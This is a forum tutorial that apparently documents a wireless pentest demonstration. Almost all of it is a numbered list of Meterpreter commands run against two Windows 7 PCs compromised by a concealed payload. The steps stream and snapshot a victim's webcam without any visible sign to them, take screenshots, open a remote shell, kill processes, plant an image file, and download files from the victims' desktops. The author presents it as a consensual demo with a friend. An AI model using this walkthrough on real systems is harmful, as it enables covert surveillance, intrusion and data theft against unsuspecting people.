Learn About Computers

Teaching about Computers


    29. Wlan Pentest session on Two Windows 7 Pcs

    Share

    Aof
    Admin

    Posts : 63
    Join date : 2018-03-24

    29. Wlan Pentest session on Two Windows 7 Pcs

    Post by Aof on Wed May 30, 2018 3:39 am


    29. Wlan Pentest session on Two Windows 7 Pcs
    ----
    The Users has already clicked the Payloads that was concealed earlier,
    The Payload has called the Linux Pc with a Meterpreter session.
    This video shows the Linux user entering the 2 Pcs through the Meterpreter Terminal.
    1. www.yougetsignal.com = do a quick check, make sure port 443 is open on the Public Ip address of the first Router.
    2. sessions -i = is entered in the listener to view all active connections that has been established.
    3. sessions -i 3 = connects to ID Number 3, the Windows 7 AUser user that has connected to the listener through the Payload.
    4. help = to view the help page for the meterpreter.
    5. webcam_list = views a list of webcams that is connected to AUser Windows 7 Pc.
    6. webcam_stream 1 = streams from Webcam 1 attached to the AUser windows 7 Pc, which happens to be the only Webcam attached to the Pc.
    7. Ctrl + mouse wheel = It shows a small thumbnail through firefox browser, you can zoom in on the thumnail by pressing Ctrl & rolling your mouse wheel. Rolling it one way, makes it smaller, while the other makes it bigger.
    I told my friend over the Phone, then she gives me a thumbs up. She doesn't see anything on-screen to indicate that I am watching her she tells me over the phone.
    8. Ctrl+C = I first exit the Streaming Firefox Tab, then go back to the Meterpreter Session and type Ctrl+C to cancel the Webcam Stream.
    9. webcam_snap 1 = takes a current snapshot of what webcam 1 is currently viewing.
    10. Opened the snapshot that had been taken with Linux default photo viewer, then use the mousewheel to zoom in on the Photo.
    11. help = typed help in the meterpreter session again, looked through the Meterpreter help page until I find Screenshot (I already knew this, but did this for demonstration purposes.)
    12. screenshot = takes a screenshot of AUser's screen, what they are viewing right now.
    It saved in the rc folder where the Listener was started.
    13. I navigate to the rc folder and preview the screenshot which was taken.
    14. shell = takes the meterpreter session right into AUser's Command Prompt as if we were standing right infront of it.
    15. tasklist = views the running processes on AUser's Windows 7 Pc.
    16. taskkill /im chrome.exe /f = kills the chrome internet browser.
    17. exit = exits the shell for AUser, and goes back to the Meterpreter session with AUser.
    18. screenshot = takes a new screenshot of AUser's screen.
    19. pwd = shows the Present Working Directory, If you get a warning that says, "failed to open" don't worry about it, just type this command and it will bypass it.
    20. upload '//root//Desktop//sltb.PNG' "C:\\Users\\AUser\\Desktop\\sltb.PNG" = Uploads the file sltb.PNG from the Linux Pc to the AUser's Desktop.
    21. shell = returns to AUser's Shell. We were in the Desktop folder using the Meterpreter Session, so we are there using the Shell as well.
    22. dir = displays the files on AUser's Desktop.
    23. sltb.PNG = executes the image file from AUser's shell, displaying the picture on the Windows 7 Pc's Screen.
    24. exit = exits AUser's shell, Linux Pc returns back to the Meterpreter Session with AUser.
    25. screenshot = takes a Screenshot of AUser's screen.
    26. Navigate to the Rc folder, and find the screenshot that was taking it, and preview it with the default Linux Image Viewer.
    The Image that was uploaded using the Meterpreter session is being shown on their screen.
    27. pwd = We receive another annoying warning message, but just typed pwd to bypass it.
    28. shell = drops into AUser's shell again.
    29. taskkill /im dllhost.exe /f = I am familiar enough with windows 7 pcs, and have looked at the process of the default image viewer enough to remember the name was dllhost,
    so I task Killed the dllhost process, this process would have also shown up somewhere if we did the tasklist to view the running processes for AUser.
    30. exit = exits the shell, goes back to the Meterpreter session with AUser.
    31. screenshot = takes another screenshot of AUser's screen, the image should be closed now.
    32. Navigate to the Rc folder and view the screenshot, the image that was uploaded is now closed because the dllhost.exe process has been terminated.
    The Thumbnail of the image that was uploaded can be visibly seen on the Desktop, since we did not delete it, we just closed the image.
    We receive another annoying warning message, this time I close it by pressing Ctrl+c, I could've just typed "pwd" again.
    33. shell = Goes into the AUser's shell again.
    34. sltb.PNG = Starts the image file again.
    35. exit = exits the AUser's Shell and goes to the Meterpression connection with AUser.
    36. dir = lists the files on the Desktop using the Meterpreter session. "ls" would have also listed the same files.
    Look for an image to download.
    37. download dspace.PNG = I gave the command to Download dspace.PNG file from AUser's Desktop. The dspace.PNG is opened from the usual rc folder, the same place where the screenshot and webcam snapshots were saved.
    38. screenshot = takes another screenshot of AUser's Desktop.
    39. Navigate to the rc folder, view the latest screenshot of AUser's Computer that the Meterpreter took.
    40. background = Backgrounding a Meterpreter session leaves it open for reconnecting as long as we have the Listener open.
    41. sessions -i 2 = opens the meterpreter session with the other pc that I had backgrounded in the Listener.
    42. pwd = finds where the meterpreter session was last backgrounded at, it was last backgrounded at GM Project's Desktop.
    43. screenshot = screenshot was taken, when it's viewed, it is revealed that GM Project's Computer Folder is currently open on their Pc.
    44. upload '//root//Desktop//sltb.PNG' "C:\\Users\\GM Project\\Desktop\\sltb.PNG" = uploads a file called sltb.PNG to the Target Pc from the Linux Pc using the Meterpreter Terminal.
    45. shell = Opens a shell between the Linux user and GM Project.
    46. dir = lists the files on Gm Project's Desktop.
    47. sltb.PNG = opens the image that was previously uploaded using GM Project's Shell.
    48. exit = exits the shell, goes back to the Meterpreter Session.
    49. screenshot = takes a screenshot of GM Project's Desktop.
    When the screenshot is viewed, it is discovered that the file is opened.
    50. dir = look for a photo to download from Gm Project's Desktop.
    51. download ozquote.PNG = downloads ozquote.PNG file from GM Project's Desktop since I am currently navigated there, there is no reason to type the full path with the Download Command.
    52. screenshot = takes another snapshot of GM Project's Desktop.
    If you were sitting infront of their computer, you couldn't
    see any of this going on except for commands being executed by the shell
    that are visible to GM Project's screen like when we opened the image that we uploaded to the pc.
    53. exit = completely closes the session with GM Project, will no longer be able to connect to it.
    54. sessions -i = views the remaining active connection with AUser.
    55. sessions -help = to view the switches associated with the Listener.
    It is discovered that the lowercase -k switch will terminate a session if the ID number is included.
    56. sessions -k 3 = Terminates the session with AUser's Pc.
    57. sessions -i = checks for active sessions, there is none.


      Current date/time is Thu Aug 16, 2018 11:28 am